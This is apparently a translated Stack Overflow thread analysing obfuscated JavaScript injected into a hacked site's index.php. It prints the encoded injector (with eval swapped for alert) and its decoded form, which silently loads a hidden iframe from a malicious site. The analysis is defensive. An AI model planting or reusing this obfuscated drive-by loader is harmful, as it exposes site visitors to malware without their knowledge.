为什么这段混淆的 JavaScript 代码是恶意的？

Question

为什么这段混淆的 JavaScript 代码是恶意的？

javascriptobfuscationdeobfuscation

5

我的一个朋友的网站被列为恶意网站，我们发现一些混淆的代码已经注入到他的index.php中而他并不知情。我解混淆了两个级别的代码，找到了以下内容：

(可以在编辑历史中查看代码)

有人能告诉我它想要做什么以及为什么是恶意的吗？

- Nathan F.

2

用 alert 替换 eval 来查看它的作用。 - georg

2个回答

2

它向页面注入一个隐藏的iframe，链接到可能是不可靠的网站。这里有一个安全版本的代码，您可以运行并查看它尝试注入什么... http://jsfiddle.net/FqtZ8/ 我访问了它链接到的网站，Chrome警告我存在恶意软件，所以我没有继续访问。

try{
if(window.document) window["document"]["body"]="123"
}catch(bawetawe){
if(window.document){
v=window;
try{
fawbe--
}catch(afnwenew){
try{
(v+v)()
}catch(gngrthn){
try{if(020===0x10)v["document"]["body"]="123"
}catch(gfdnfdgber){
m=123;
if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];
}
}
n=            ["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","    j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];
h=2;
s="";
if(m) for(i=0;i-589!=0;i++){
k=i;
if(window["document"]) s+=String["fro"+"mC"+"harCode"](
parseInt(n[i],25)
);
}z=s;alert(z);
}
}
}?

- Reinstate Monica Cellio

网页内容由stack overflow 提供, 点击上面的

可以查看英文原文，
原文链接

- newfurniturey · Accepted Answer

总之，这段代码“解码”放置了一个加载恶意URL的<iframe>的HTML。

以下是包含“编码”HTML的行：

n = ["9","9","45","42", ...

每个数字代表了一个基于25进制的字符。代码将循环遍历该数组，并使用JavaScript中的String.fromCharCode()将其转换为ASCII字符。在这一切完成之后，它会使用eval()在页面上呈现它。

“解码”后的JavaScript代码是：

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

请注意，出于安全考虑，我已从代码中删除了恶意URL。